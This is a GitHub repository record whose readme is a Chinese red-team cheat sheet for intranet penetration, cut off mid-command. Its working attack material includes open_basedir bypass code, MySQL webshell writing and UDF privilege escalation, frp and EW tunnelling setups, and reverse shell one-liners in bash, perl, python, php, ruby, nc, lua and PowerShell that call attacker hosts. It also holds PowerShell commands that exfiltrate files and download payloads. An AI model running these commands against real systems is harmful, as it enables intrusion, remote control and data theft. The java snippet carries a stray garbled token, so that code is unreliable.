{"id":13844574,"url":"https://github.com/zer0yu/RedTeam_CheetSheets","last_synced_at":"2025-07-11T23:33:47.819Z","repository":{"id":107688098,"uuid":"297952888","full_name":"zer0yu/RedTeam_CheetSheets","owner":"zer0yu","description":"RedTeam参考,修改自Ridter的https://github.com/Ridter/Intranet_Penetration_Tips","archived":false,"fork":false,"pushed_at":"2021-09-16T14:55:23.000Z","size":467,"stargazers_count":89,"open_issues_count":0,"forks_count":22,"subscribers_count":6,"default_branch":"master","last_synced_at":"2025-06-28T23:07:09.758Z","etag":null,"topics":["hacking","redteam","websecurity"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/zer0yu.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2020-09-23T11:49:14.000Z","updated_at":"2025-01-17T12:03:03.000Z","dependencies_parsed_at":"2023-03-13T14:34:08.264Z","dependency_job_id":null,"html_url":"https://github.com/zer0yu/RedTeam_CheetSheets","commit_stats":null,"previous_names":["zer0yu/intranet_penetration_cheetsheets"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/zer0yu/RedTeam_CheetSheets","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/zer0yu%2FRedTeam_CheetSheets","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/zer0yu%2FRedTeam_CheetSheets/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/zer0yu%2FRedTeam_CheetSheets/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/zer0yu%2FRedTeam_CheetSheets/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/zer0yu","download_url":"https://codeload.github.com/zer0yu/RedTeam_CheetSheets/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/zer0yu%2FRedTeam_CheetSheets/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":264914571,"owners_count":23682853,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["hacking","redteam","websecurity"],"created_at":"2024-08-04T17:02:46.063Z","updated_at":"2025-07-11T23:33:47.522Z","avatar_url":"https://github.com/zer0yu.png","language":null,"readme":"# Intranet Penetration CheetSheets\n\nModified by: [z3r0yu](https://twitter.com/zeroyu_)\nBlog: http://zeroyu.xyz\n\nTable of Contents\n=================\n\n * [信息搜集](#信息搜集)\n * [开源情报信息收集(OSINT)](#开源情报信息收集osint)\n * [github](#github)\n * [whois查询/注册人反查/邮箱反查/相关资产](#whois查询注册人反查邮箱反查相关资产)\n * [google hacking](#google-hacking)\n * [创建企业密码字典](#创建企业密码字典)\n * [字典列表](#字典列表)\n * [密码生成](#密码生成)\n * [邮箱列表获取](#邮箱列表获取)\n * [泄露密码查询](#泄露密码查询)\n * [对企业外部相关信息进行搜集](#对企业外部相关信息进行搜集)\n * [子域名获取](#子域名获取)\n * [进入内网](#进入内网)\n * [基于企业弱账号漏洞](#基于企业弱账号漏洞)\n * [基于系统漏洞进入](#基于系统漏洞进入)\n * [网站应用程序渗透](#网站应用程序渗透)\n * [无线Wi-Fi接入](#无线wi-fi接入)\n * [隐匿攻击](#隐匿攻击)\n * [Command and Control](#command-and-control)\n * [Fronting](#fronting)\n * [代理](#代理)\n * [内网跨边界应用](#内网跨边界应用)\n * [内网跨边界转发](#内网跨边界转发)\n * [内网跨边界代理穿透](#内网跨边界代理穿透)\n * [\u003ca href=\"https://rootkiter.com/EarthWorm/\" rel=\"nofollow\"\u003eEW\u003c/a\u003e](#ew)\n * [\u003ca href=\"https://rootkiter.com/Termite/\" rel=\"nofollow\"\u003eTermite\u003c/a\u003e](#termite)\n * [代理脚本](#代理脚本)\n * [shell反弹](#shell反弹)\n * [内网文件的传输和下载](#内网文件的传输和下载)\n * [搭建 HTTP server](#搭建-http-server)\n * [内网信息搜集](#内网信息搜集)\n * [本机信息搜集](#本机信息搜集)\n * [1. 用户列表](#1用户列表)\n * [2. 进程列表](#2进程列表)\n * [3. 服务列表](#3服务列表)\n * [4. 端口列表](#4端口列表)\n * [5. 补丁列表](#5补丁列表)\n * [6. 本机共享](#6本机共享)\n * [7. 本用户习惯分析](#7本用户习惯分析)\n * [8. 获取当前用户密码工具](#8获取当前用户密码工具)\n * [Windows](#windows)\n * [Linux](#linux)\n * [扩散信息收集](#扩散信息收集)\n * [端口扫描](#端口扫描)\n * [常用端口扫描工具](#常用端口扫描工具)\n * [网卡信息扫描(开放135端口)](#网卡信息扫描(开放135端口))\n * [内网拓扑架构分析](#内网拓扑架构分析)\n * [常见信息收集命令](#常见信息收集命令)\n * [第三方信息收集](#第三方信息收集)\n * [权限提升](#权限提升)\n * [Windows](#windows-1)\n * [BypassUAC](#bypassuac)\n * [常用方法](#常用方法)\n * [常用工具](#常用工具)\n * [提权](#提权)\n * [Linux](#linux-1)\n * [内核溢出提权](#内核溢出提权)\n * [计划任务](#计划任务)\n * [SUID](#suid)\n * [系统服务的错误权限配置漏洞](#系统服务的错误权限配置漏洞)\n * [不安全的文件/文件夹权限配置](#不安全的文件文件夹权限配置)\n * [找存储的明文用户名,密码](#找存储的明文用户名密码)\n * [权限维持](#权限维持)\n * [系统后门](#系统后门)\n * [Windows](#windows-2)\n * [1. 密码记录工具](#1密码记录工具)\n * [2. 常用的存储Payload位置](#2常用的存储payload位置)\n * [3. Run/RunOnce Keys](#3runrunonce-keys)\n * [4. BootExecute Key](#4bootexecute-key)\n * [5. Userinit Key](#5userinit-key)\n * [6. Startup Keys](#6startup-keys)\n * [7. Services](#7services)\n * [8. Browser Helper Objects](#8browser-helper-objects)\n * [9. AppInit_DLLs](#9appinit_dlls)\n * [10. 文件关联](#10文件关联)\n * [11. \u003ca href=\"http://www.liuhaihua.cn/archives/357579.html\" rel=\"nofollow\"\u003ebitsadmin\u003c/a\u003e](#11bitsadmin)\n * [12. \u003ca href=\"https://evi1cg.me/archives/Powershell_MOF_Backdoor.html\" rel=\"nofollow\"\u003emof \u003c/a\u003e](#12mof-)\n * [13. \u003ca href=\"https://3gstudent.github.io/3gstudent.github.io/Study-Notes-of-WMI-Persistence-using-wmic.exe/\" rel=\"nofollow\"\u003ewmi\u003c/a\u003e](#13wmi)\n * [14. \u003ca href=\"https://3gstudent.github.io/3gstudent.github.io/Userland-registry-hijacking/\" rel=\"nofollow\"\u003eUserland Persistence With Scheduled Tasks\u003c/a\u003e](#14userland-persistence-with-scheduled-tasks)\n * [15. \u003ca href=\"https://3gstudent.github.io/3gstudent.github.io/Netsh-persistence/\" rel=\"nofollow\"\u003eNetsh\u003c/a\u003e](#15netsh)\n * [16. \u003ca href=\"https://3gstudent.github.io/3gstudent.github.io/渗透测试中的Application-Compatibility-Shims/\" rel=\"nofollow\"\u003eShim\u003c/a\u003e](#16shim)\n * [17. \u003ca href=\"https://3gstudent.github.io/3gstudent.github.io/DLL劫持漏洞自动化识别工具Rattler测试/\" rel=\"nofollow\"\u003eDLL劫持\u003c/a\u003e](#17dll劫持)\n * [18. \u003ca href=\"https://3gstudent.github.io/3gstudent.github.io/渗透测试中的Application-Verifier(DoubleAgent利用介绍)/\" rel=\"nofollow\"\u003eDoubleAgent \u003c/a\u003e](#18doubleagent-)\n * [19. \u003ca href=\"https://3gstudent.github.io/3gstudent.github.io/Use-Waitfor.exe-to-maintain-persistence/\" rel=\"nofollow\"\u003ewaitfor.exe \u003c/a\u003e](#19waitforexe-)\n * [20. \u003ca href=\"https://3gstudent.github.io/3gstudent.github.io/Use-AppDomainManager-to-maintain-persistence/\" rel=\"nofollow\"\u003eAppDomainManager\u003c/a\u003e](#20appdomainmanager)\n * [21. Office](#21office)\n * [22. \u003ca href=\"https://3gstudent.github.io/3gstudent.github.io/Use-CLR-to-maintain-persistence/\" rel=\"nofollow\"\u003eCLR\u003c/a\u003e](#22clr)\n * [23. \u003ca href=\"https://3gstudent.github.io/3gstudent.github.io/Use-msdtc-to-maintain-persistence/\" rel=\"nofollow\"\u003emsdtc\u003c/a\u003e](#23msdtc)\n * [24. \u003ca href=\"https://3gstudent.github.io/3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack-CAccPropServicesClass-and-MMDeviceEnumerator/\" rel=\"nofollow\"\u003eHijack CAccPropServicesClass and MMDeviceEnumerato\u003c/a\u003e](#24hijack-caccpropservicesclass-and-mmdeviceenumerato)\n * [25. \u003ca href=\"https://3gstudent.github.io/3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack-explorer.exe/\" rel=\"nofollow\"\u003eHijack explorer.exe\u003c/a\u003e](#25hijack-explorerexe)\n * [26. Windows FAX DLL Injection](#26windows-fax-dll-injection)\n * [27. 特殊注册表键值](#27特殊注册表键值)\n * [28. 快捷方式后门](#28快捷方式后门)\n * [29. \u003ca href=\"https://3gstudent.github.io/3gstudent.github.io/Use-Logon-Scripts-to-maintain-persistence/\" rel=\"nofollow\"\u003eLogon Scripts\u003c/a\u003e](#29logon-scripts)\n * [30. \u003ca href=\"https://3gstudent.github.io/3gstudent.github.io/Password-Filter-DLL在渗透测试中的应用/\" rel=\"nofollow\"\u003ePassword Filter DLL\u003c/a\u003e](#30password-filter-dll)\n * [31. \u003ca href=\"https://3gstudent.github.io/3gstudent.github.io/利用BHO实现IE浏览器劫持/\" rel=\"nofollow\"\u003e利用BHO实现IE浏览器劫持\u003c/a\u003e](#31利用bho实现ie浏览器劫持)\n * [Linux](#linux-2)\n * [crontab](#crontab)\n * [硬链接sshd](#硬链接sshd)\n * [SSH Server wrapper](#ssh-server-wrapper)\n * [SSH keylogger](#ssh-keylogger)\n * [Cymothoa_进程注入backdoor](#cymothoa_进程注入backdoor)\n * [Vegile_进程注入backdoor](#Vegile_进程注入backdoor)\n * [rootkit](#rootkit)\n * [Tools](#tools)\n * [WEB后门](#web后门)\n * [横向渗透](#横向渗透)\n * [端口渗透](#端口渗透)\n * [端口扫描](#端口扫描-1)\n * [端口爆破](#端口爆破)\n * [端口弱口令](#端口弱口令)\n * [端口溢出](#端口溢出)\n * [常见的默认端口](#常见的默认端口)\n * [1. web类(web漏洞/敏感目录)](#1web类web漏洞敏感目录)\n * [2. 数据库类(扫描弱口令)](#2数据库类扫描弱口令)\n * [3. 特殊服务类(未授权/命令执行类/漏洞)](#3特殊服务类未授权命令执行类漏洞)\n * [4. 常用端口类(扫描弱口令/端口爆破)](#4常用端口类扫描弱口令端口爆破)\n * [5. 端口合计所对应的服务](#5端口合计所对应的服务)\n * [域渗透](#域渗透)\n * [信息搜集](#信息搜集-1)\n * [powerview.ps1](#powerviewps1)\n * [BloodHound](#bloodhound)\n * [获取域内DNS信息](#获取域内dns信息)\n * [获取域控的方法](#获取域控的方法)\n * [SYSVOL](#sysvol)\n * [MS14-068 Kerberos](#ms14-068-kerberos)\n * [SPN扫描](#spn扫描)\n * [Kerberos的黄金门票](#kerberos的黄金门票)\n * [Kerberos的银票务](#kerberos的银票务)\n * [域服务账号破解](#域服务账号破解)\n * [凭证盗窃](#凭证盗窃)\n * [NTLM relay](#ntlm-relay)\n * [Kerberos委派](#kerberos委派)\n * [地址解析协议](#地址解析协议)\n * [获取AD哈希](#获取ad哈希)\n * [AD持久化](#ad持久化)\n * [活动目录持久性技巧](#活动目录持久性技巧)\n * [Security Support Provider](#security-support-provider)\n * [\u003ca href=\"https://adsecurity.org/?p=1772\" rel=\"nofollow\"\u003eSID History\u003c/a\u003e](#sid-history)\n * [\u003ca href=\"https://adsecurity.org/?p=1906\" rel=\"nofollow\"\u003eAdminSDHolder&SDProp \u003c/a\u003e](#adminsdholdersdprop-)\n * [组策略](#组策略)\n * [Hook PasswordChangeNotify](#hook-passwordchangenotify)\n * [Kerberoasting后门](#kerberoasting后门)\n * [AdminSDHolder](#adminsdholder)\n * [Delegation](#delegation)\n * [其他](#其他)\n * [域内主机提权](#域内主机提权)\n * [Exchange的利用](#exchange的利用)\n * [TIPS](#tips)\n * [相关工具](#相关工具)\n * [在远程系统上执行程序](#在远程系统上执行程序)\n * [IOT相关](#iot相关)\n * [中间人](#中间人)\n * [规避杀软及检测](#规避杀软及检测)\n * [Bypass Applocker](#bypass-applocker)\n * [bypassAV](#bypassav)\n * [痕迹清理](#痕迹清理)\n * [\u003ca href=\"https://3gstudent.github.io/3gstudent.github.io/渗透技巧-Windows日志的删除与绕过/\" rel=\"nofollow\"\u003eWindows日志清除\u003c/a\u003e](#windows日志清除)\n * [破坏Windows日志记录功能](#破坏windows日志记录功能)\n * [msf](#msf)\n * [3389登陆记录清除](#3389登陆记录清除)\n\n\n## 信息搜集 \n### 开源情报信息收集(OSINT) \n#### github \n* Github_Nuggests(自动爬取Github上文件敏感信息泄露) :https://github.com/az0ne/Github_Nuggests\n* GSIL(能够实现近实时(15分钟内)的发现Github上泄露的信息) :https://github.com/FeeiCN/GSIL\n* x-patrol(小米团队的):https://github.com/MiSecurity/x-patrol\n\n#### whois查询/注册人反查/邮箱反查/相关资产\n\n* 站长之家:http://whois.chinaz.com/?DomainName=target.com\u0026ws=\n* 爱站:https://whois.aizhan.com/target.com/\n* 微步在线:https://x.threatbook.cn/\n* IP反查:https://dns.aizhan.com/\n* 天眼查:https://www.tianyancha.com/\n* 虎妈查:http://www.whomx.com/\n* 历史漏洞查询 :\n * 在线查询:http://wy.zone.ci/\n * 自搭建:https://github.com/hanc00l/wooyun_publi/\n\n#### google hacking \n\n### 创建企业密码字典 \n#### 字典列表 \n* passwordlist:https://github.com/lavalamp-/password-lists\n* 猪猪侠字典:https://pan.baidu.com/s/1dFJyedz\n[Blasting_dictionary](https://github.com/rootphantomer/Blasting_dictionary)(分享和收集各种字典,包括弱口令,常用密码,目录爆破。数据库爆破,编辑器爆破,后台爆破等) \n* 针对特定的厂商,重点构造厂商相关域名的字典\n```\n['%pwd%123','%user%123','%user%521','%user%2017','%pwd%321','%pwd%521','%user%321','%pwd%123!','%pwd%123!@#','%pwd%1234','%user%2016','%user%123$%^','%user%123!@#','%pwd%2016','%pwd%2017','%pwd%1!','%pwd%2@','%pwd%3#','%pwd%123#@!','%pwd%12345','%pwd%123$%^','%pwd%!@#456','%pwd%123qwe','%pwd%qwe123','%pwd%qwe','%pwd%123456','%user%123#@!','%user%!@#456','%user%1234','%user%12345','%user%123456','%user%123!']\n```\n\n#### 密码生成 \n\n* GenpAss(中国特色的弱口令生成器: https://github.com/RicterZ/genpAss/\n* passmaker(可以自定义规则的密码字典生成器) :https://github.com/bit4woo/passmaker\n* pydictor(强大的密码生成器) :https://github.com/LandGrey/pydictor\n* 白鹿社工字典生成器:https://github.com/HongLuDianXue/BaiLu-SED-Tool\n\n#### 邮箱列表获取 \n\n* theHarvester :https://github.com/laramies/theHarvester\n* 获取一个邮箱以后导出通讯录 \n* LinkedInt :https://github.com/mdsecactivebreach/LinkedInt\n* Mailget:https://github.com/Ridter/Mailget\n\n#### 泄露密码查询\n* ghostproject: https://ghostproject.fr/\n* pwndb: https://pwndb2am4tzkvold.onion.to/\n\n#### 加密密码破解\n* pwcrack-framework(自动猜测可能的加密方式并破解): https://github.com/L-codes/pwcrack-framework\n\n#### 对企业外部相关信息进行搜集\n##### 子域名获取 \n* Layer子域名挖掘机4.2纪念版 \n* subDomainsBrute :https://github.com/lijiejie/subDomainsBrute\n* wydomain :https://github.com/ring04h/wydomain\n* Sublist3r :https://github.com/aboul3la/Sublist3r\n* site:target.com:https://www.google.com\n* Github代码仓库 \n* 抓包分析请求返回值(跳转/文件上传/app/api接口等) \n* 站长帮手links等在线查询网站 \n* 域传送漏洞 \n* OneForAll : https://github.com/shmilylty/OneForAll\n\nLinux\n```\ndig @ns.example.com example=.com AXFR \n```\nWindows\n```\nnslookup -type=ns xxx.yyy.cn #查询解析某域名的DNS服务器\nnslookup #进入nslookup交互模式\nserver dns.domian.com #指定dns服务器\nls xxx.yyy.cn #列出域信息\n```\n\n* GetDomainsBySSL.py :https://note.youdao.com/ynoteshare1/index.html?id=247d97fc1d98b122ef9804906356d47a\u0026type=note#/\n* censys.io证书 :https://censys.io/certificates?q=target.com\n* crt.sh证书查询:https://crt.sh/?q=%25.target.com\n* shadon :https://www.shodan.io/\n* zoomeye :https://www.zoomeye.org/\n* fofa :https://fofa.so/\n* censys:https://censys.io/\n* dnsdb.io :https://dnsdb.io/zh-cn/search?q=target.com\n* api.hackertarget.com :http://api.hackertarget.com/reversedns/?q=target.com\n* community.riskiq.com :https://community.riskiq.com/Search/target.com\n* subdomain3 :https://github.com/yanxiu0614/subdomain3\n* FuzzDomain :https://github.com/Chora10/FuzzDomain\n* dnsdumpster.com :https://dnsdumpster.com/\n* phpinfo.me :https://phpinfo.me/domain/\n* dns开放数据接口 :https://dns.bufferover.run/dns?q=baidu.com\n* pipl.com :https://pipl.com/\n* Source Code Search Engine :https://publicwww.com/\n* Hunter lets you find email addresses in seconds and connect with the people that matter for your business :https://hunter.io/\n* searchcode :https://searchcode.com/\n* greynoise :https://greynoise.io/\n\n## 外网穿透\n\n### 绕过open_basedir\n\n1. ini_set绕过\n\n```\nmkdir('img');\nchdir('img');\nini_set('open_basedir','..');\nchdir('..');\nchdir('..');\nchdir('..');\nchdir('..');\nchdir('..');\nchdir('..');\nchdir('..');\nini_set('open_basedir','/');\n```\n\n2. 系统命令执行绕过;\n\n system(\"cd /;ls\")\n\n3. glob://伪协议绕过\n\n ```\n \u003c?php\n // 循环 ext/spl/examples/ 目录里所有 *.php 文件\n // 并打印文件名和文件尺寸\n $it = new DirectoryIterator(\"glob://ext/spl/examples/*.php\");\n foreach($it as $f) {\n printf(\"%s: %.1FK\\n\", $f-\u003egetFilename(), $f-\u003egetSize()/1024);\n }\n ?\u003e\n \n \u003c?php\n $a = new DirectoryIterator(\"glob:///*\");\n foreach($a as $f){\n echo($f-\u003e__toString().'\u003cbr\u003e');\n }\n ?\u003e\n \n \u003c?php\n var_dump(scandir('glob:///*'));\n \u003e\n \n \u003c?php\n if ( $b = opendir('glob:///*') ) {\n while ( ($file = readdir($b)) !== false ) {\n echo $file.\"\u003cbr\u003e\";\n }\n closedir($b);\n }\n ?\u003e\n ```\n\n4. symlink函数绕过\n\n symlink()对于已有的target建立一个名为link的符号连接。\n\n ```\n 读取/etc/passwd\n \u003c?php\n mkdir(\"a\");\n chdir(\"a\");\n mkdir(\"b\");\n chdir(\"b\");\n mkdir(\"c\");\n chdir(\"c\");\n mkdir(\"d\");\n chdir(\"d\");\n chdir(\"..\");\n chdir(\"..\");\n chdir(\"..\");\n chdir(\"..\");\n symlink(\"a/b/c/d\",\"Von\");\n symlink(\"Von/../../../../etc/passwd\",\"exp\");\n unlink(\"Von\");\n mkdir(\"Von\");\n system('cat exp');\n ```\n\n5. 还有一些鸡肋的[办法](https://www.v0n.top/2020/07/10/open_basedir%E7%BB%95%E8%BF%87/)\n\n \n\n### 绕过disable_function\n\n1. 蚁剑插件\n\n2. https://mp.weixin.qq.com/s?__biz=MzU3ODc2NTg1OA==\u0026mid=2247485666\u0026idx=1\u0026sn=71a0cce05637edd488cb9cccb3967504\n\n 直接把php脚本传上去,然后传参就可以执行命令,不过是无回显的,这样弹回的shell有时是一次性的,连上执行不了命令,解决办法是用stowaway\n\n参考:https://blog.z3ratu1.cn/%E4%BB%8EByteCTF%E5%88%B0bypass_disable_function.html\n\n​\t\t\thttps://www.cnblogs.com/sakura521/p/15055907.html\n\n\n\n### Mysql 拿shell\n\n```\n写文件\nshow global variables like '%secure_file_priv%';\nselect '\u003c?php phpinfo(); ?\u003e' into outfile '/var/www/html/info.php';\nsqlmap -u \"http://x.x.x.x/?id=x\" --file-write=\"/Users/guang/Desktop/shell.php\" --file-dest=\"/var/www/html/test/shell.php\"\n\n日志拿shell\nSHOW VARIABLES LIKE 'general%';\n# 更改日志文件位置\nset global general_log = \"ON\";\nset global general_log_file='/var/www/html/info.php';\nselect '\u003c?php phpinfo();?\u003e';\n\n知道用户名多次密码错误有几率登陆\nfor i in `seq 1 1000`; do mysql -uroot -pwrong -h 127.0.0.1 -P3306 ; done\n\nUDF提权\n动态库下载:https://sqlsec.lanzoux.com/i4b7jhyhwid\n查看插件目录\nshow variables like '%plugin%';\nselect @@basedir;\n没有的话创建:\nselect 233 into dumpfile 'C:\\\\PhpStudy\\\\PHPTutorial\\\\MySQL\\\\lib\\\\plugin::$index_allocation';\n写入动态链接库\nsqlmap -u \"http://localhost:30008/\" --data=\"id=1\" --file-write=\"/Users/sec/Desktop/lib_mysqludf_sys_64.so\" --file-dest=\"/usr/lib/mysql/plugin/udf.so\"\n创建函数\nCREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';\nselect * from mysql.func;\nselect sys_eval('whoami');\ndrop function sys_eval;\n```\n\n[t00ls UDF.PHP](https://github.com/echohun/tools/blob/master/大马/udf.php) 网页脚本,一键UDF\n\n[参考](https://www.sqlsec.com/2020/11/mysql.html#toc-heading-31)\n\n\n\n\n\n### 域前置\n\n* [Domain Fronting ](https://evi1cg.me/archives/Domain_Fronting.html)\n* [Tor_Fronting.](https://evi1cg.me/archives/Tor_Fronting.html)\n### 代理搭建\n* VPN \n\n* shadowsockts :https://github.com/shadowsocks\n\n* HTTP :http://cn-proxy.com/\n\n* Tor\n\n* [Venom](https://github.com/Dliv3/Venom) -- 但是不支持UDP流量\n\n* [Stowaway](https://github.com/ph4ntonn/Stowaway) -- 支持UDP流量,稳定性好\n\n ```\n admin: ./stowaway_admin -l 9999\n agent: ./stowaway_agent -c 127.0.0.1:9999 --reconnect 10\n ```\n\n* [nps](https://github.com/ehang-io/nps)\n\n* [frp](https://github.com/fatedier/frp)\n\n ```\n VPS配置:\n [common]\n bind_addr = 0.0.0.0\n bind_port = 7000\n token = test\n #port,token自定义 保持客户端与服务端一致即可\n \n web界面\n # dashboard_addr = 0.0.0.0 \n # 端口必须设置,只有设置web页面才生效\n dashboard_port = 7500\n # 用户密码\n dashboard_user = admin1\n dashboard_pwd = hadaessd@@@!!@@#\n # 允许客户端绑定的端口\n allow_ports = 40000-50000\n \n 启动服务端:\n nohup ./frps -c frps.ini \u0026\n \n \n 目标机上配置:\n #编辑frpc.ini内容如下,与frpc一并上传到服务器\n # chmod +x frpc(最好将其改个名,比如deamon)\n [common]\n server_addr = xxx.xxx.xx.xxx\n # port,token保持一致\n server_port = 7000\n token = test\n tls_enable = true\n pool_count = 5\n \n #http协议代理\n [plugin_http_proxy]\n type = tcp\n remote_port = 7890\n plugin = http_proxy\n # 可以添加认证\n # plugin_http_user = abc\n # plugin_http_passwd = abc\n \n #socks5协议代理\n [plugin_socks5]\n type = tcp\n remote_port = 7891\n plugin = socks5\n # plugin_user = abc\n # plugin_passwd = abc\n use_encryption = true\n use_compression = true\n ```\n\n- [frpModify](https://github.com/uknowsec/frpModify) -\u003e 修改之后支持域前置以及自删除\n\n* proxychain `proxychain4 -q bash #终端全局代理`\n\n* Neo-reGeorg : https://github.com/L-codes/Neo-reGeorg\n\n ```\n python3 neoreg.py -k password -u http://xx/tunnel.php\n ```\n\n- [chisel](https://github.com/jpillora/chisel)--文章介绍[《Red Team: Using SharpChisel to exfil internal network》](https://medium.com/@shantanukhande/red-team-using-sharpchisel-to-exfil-internal-network-e1b07ed9b49)\n\n- [SharpChisel](https://github.com/shantanu561993/SharpChisel)--chisel的c#封装版本\n\n- [mssqlproxy](https://github.com/blackarrowsec/mssqlproxy)--利用mssql执行clr作为传输通道(当目标机器只开放mssql时)\n\n- [ligolo](https://github.com/FunnyWolf/ligolo) -- 轻量级的反向Socks5代理工具,所有的流量使用TLS加密\n\n* [NC端口转发](https://blog.csdn.net/l_f0rm4t3d/article/details/24004555) \n\n* [LCX端口转发 ](http://blog.chinaunix.net/uid-53401-id-4407931.html)\n\n* [nps](https://github.com/cnlh/nps) -\u003e 个人用觉得比较稳定 ~\n\n* [Tunna ](https://github.com/SECFORCE/Tunna)\n\n* [Reduh ](https://github.com/sensepost/reDuh)\n\n* [pystinger](https://github.com/FunnyWolf/pystinger) -\u003e 毒刺(pystinger)通过webshell实现内网SOCK4代理,端口映射.\n\n* [EW](https://rootkiter.com/EarthWorm/) \n\n 正向 SOCKS v5 服务器:\n\n ```\n ./ew -s ssocksd -l 1080\n ```\n\n 反弹 SOCKS v5 服务器:\n a) 先在一台具有公网 ip 的主机A上运行以下命令:\n\n ```\n $ ./ew -s rcsocks -l 1080 -e 8888 \n \n ```\n\n b) 在目标主机B上启动 SOCKS v5 服务 并反弹到公网主机的 8888端口\n\n ```\n $ ./ew -s rssocks -d 1.1.1.1 -e 8888 \n ```\n\n 多级级联\n\n ```\n $ ./ew -s lcx_listen -l 1080 -e 8888\n $ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999\n $ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999\n ```\n\n lcx_tran 的用法\n\n ```\n $ ./ew -s ssocksd -l 9999\n $ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999\n ```\n\n lcx_listen. lcx_slave 的用法\n\n ```\n $ ./ew -s lcx_listen -l 1080 -e 8888\n $ ./ew -s ssocksd -l 9999\n $ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999\n ```\n\n “三级级联”的本地SOCKS测试用例以供参考\n\n ```\n $ ./ew -s rcsocks -l 1080 -e 8888\n $ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999\n $ ./ew -s lcx_listen -l 9999 -e 7777\n $ ./ew -s rssocks -d 127.0.0.1 -e 7777\n ```\n\n- [Termite](https://rootkiter.com/Termite/) 使用说明:https://rootkiter.com/Termite/README.txt \n\n \n\n\n### shell反弹 \nbash \n```\nbash -i \u003e\u0026 /dev/tcp/10.0.0.1/8080 0\u003e\u00261\n```\nperl \n```\nperl -e 'use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/sh -i\");};'\n```\npython \n```\npython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.1\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n```\nphp \n```\nphp -r '$sock=fsockopen(\"10.0.0.1\",1234);exec(\"/bin/sh -i \u003c\u00263 \u003e\u00263 2\u003e\u00263\");'\n```\nruby \n```\nruby -rsocket -e'f=TCPSocket.open(\"10.0.0.1\",1234).to_i;exec sprintf(\"/bin/sh -i \u003c\u0026%d \u003e\u0026%d 2\u003e\u0026%d\",f,f,f)'\n```\njava \n```\nr = Runtime.getRuntime()\np = r.exec([\"/bin/bash\",\"-c\",\"exec 5\u003c\u003e/dev/tcp/10.0.0.1/2002;cat \u003c\u00265 | while read line; do \\$line 2\u003e\u00265 \u003e\u00265; done\"] 创维A20 String[])\np.waitFor()\n```\nnc \n```\n#使用-e \nnc -e /bin/sh 223.8.200.234 1234 \n```\n```\n#不使用-e\nmknod /tmp/backpipe p\n/bin/sh 0/tmp/backpipe | nc attackerip listenport 1\u003e/tmp/backpipe\n```\n\nlua \n```\nlua -e \"require('socket');require('os');t=socket.tcp();t:connect('202.103.243.122','1234');os.execute('/bin/sh -i \u003c\u00263 \u003e\u00263 2\u003e\u00263');\"\n```\n\nstcp协议反弹shell\n```\n# https://github.com/srat1999/sctp-shell\n# server \nsudo ./scp-shell -s -lp 443 -a 192.168.0.189\n# client\n./scp-shell -a 192.168.0.189 -lp 56738 -rp 443\n```\n\n利用powershell反弹全交互式shell\n```\n# server \nstty raw -echo; (stty size; cat) | nc -lvnp 3001\n# client\nIEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.0.0.2 3001\n```\n\n### 内网文件的传输和下载 \nwput \n```\nwput dir_name ftp://linuxpig:123456@host.com/\n```\nwget \n```\nwget http://site.com/1.rar -O 1.rar\n```\nariac2(需安装) \n```\naria2c -o owncloud.zip https://download.owncloud.org/community/owncloud-9.0.0.tar.bz2\n```\npowershell\n```\n$p = New-Object System.Net.WebClient \n$p.DownloadFile(\"http://domain/file\",\"C:%homepath%file\") \n```\n\n回传文件\n```\nphp起服务: php -S 0.0.0.0:8888\n\u003c?php\n$file = date(\"Hism\");\nfile_put_contents($file, file_get_contents(\"php://input\"));\n\npowershell回传:powershell iwr ip:8888/upload.php -method POST -infile C:\\xx\\xx\\xx.zip\n```\n下载文件\n```\npowershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://95.163.202.147:8000/vendor.jsp', 'a.jsp')\n```\n\n下载并执行\n```\npowershell IEX (New-Object 